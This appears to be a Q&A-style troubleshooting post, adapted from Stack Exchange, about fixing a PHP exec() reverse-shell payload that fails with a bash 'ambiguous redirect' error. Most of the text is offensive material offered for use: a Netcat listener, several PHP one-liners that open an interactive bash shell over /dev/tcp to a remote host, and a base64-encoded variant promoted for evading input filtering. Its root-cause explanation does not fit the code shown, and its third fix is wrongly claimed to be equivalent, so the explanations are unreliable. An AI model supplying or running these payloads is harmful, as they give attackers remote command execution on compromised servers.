Netcat监听端出现bash: 1");: ambiguous redirect错误原因排查
Let's break down why you're hitting this error and how to fix it.
Your Setup
First, you're running a Netcat listener on port 4444:
nc -nlvp 4444
Then you're executing this PHP code to spawn a reverse shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1'");?>
But your listener throws this error:
listening on [any] 4444 ... connect to [xx.xx.x.xx] from (UNKNOWN) [xx.xx.x.xx] 59914 bash: 1");: ambiguous redirect
Root Cause
This is a quote nesting conflict between PHP and bash. When PHP processes the exec string, the inner single quotes around the bash command don't play nicely with how the system shell parses the input.
Here's the exact issue: PHP passes the command to the shell, which ends up interpreting it as:
/bin/bash -c 'bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1'");
The trailing "); gets tacked onto the end because the single quote closure in your PHP code is misinterpreted. This mangles the redirection syntax (0>&1");), leaving bash confused about what you're trying to redirect—hence the "ambiguous redirect" error.
Fixes
You have a few straightforward ways to resolve this:
1. Fix the Quote Nesting
Swap the inner single quotes for escaped double quotes so both PHP and bash parse the command correctly:
<?php exec("/bin/bash -c \"bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1\"");?>
By escaping the double quotes with \, PHP passes the full, unbroken bash command to the shell, which can execute the redirections without issue.
2. Use Base64 Encoding (Great for Bypassing Restrictions)
If quote handling is still problematic (or you're dealing with input filtering), encode your bash command as base64 and have bash decode it on execution:
<?php exec("/bin/bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54Lnh4LzQ0NDQgMD4mMQo= | base64 -d | bash'");?>
Note: The base64 string above is bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1 encoded. Re-generate it yourself with echo -n "bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1" | base64 to ensure it matches your target IP.
3. Simplify the Redirection Syntax
You can also shorten the redirection to make the command cleaner (while fixing quotes):
<?php exec("/bin/bash -c \"bash -i &> /dev/tcp/xx.xx.x.xx/4444\"");?>
The &> syntax in bash redirects both stdout and stderr to the target, which achieves the same result as the longer >& /dev/tcp/... 0>&1 syntax.
Wrap-Up
The core issue was misaligned quote handling causing bash to receive a broken command. Fixing the quote nesting or using base64 encoding should get your reverse shell working without the ambiguous redirect error.
内容的提问来源于stack exchange,提问作者John

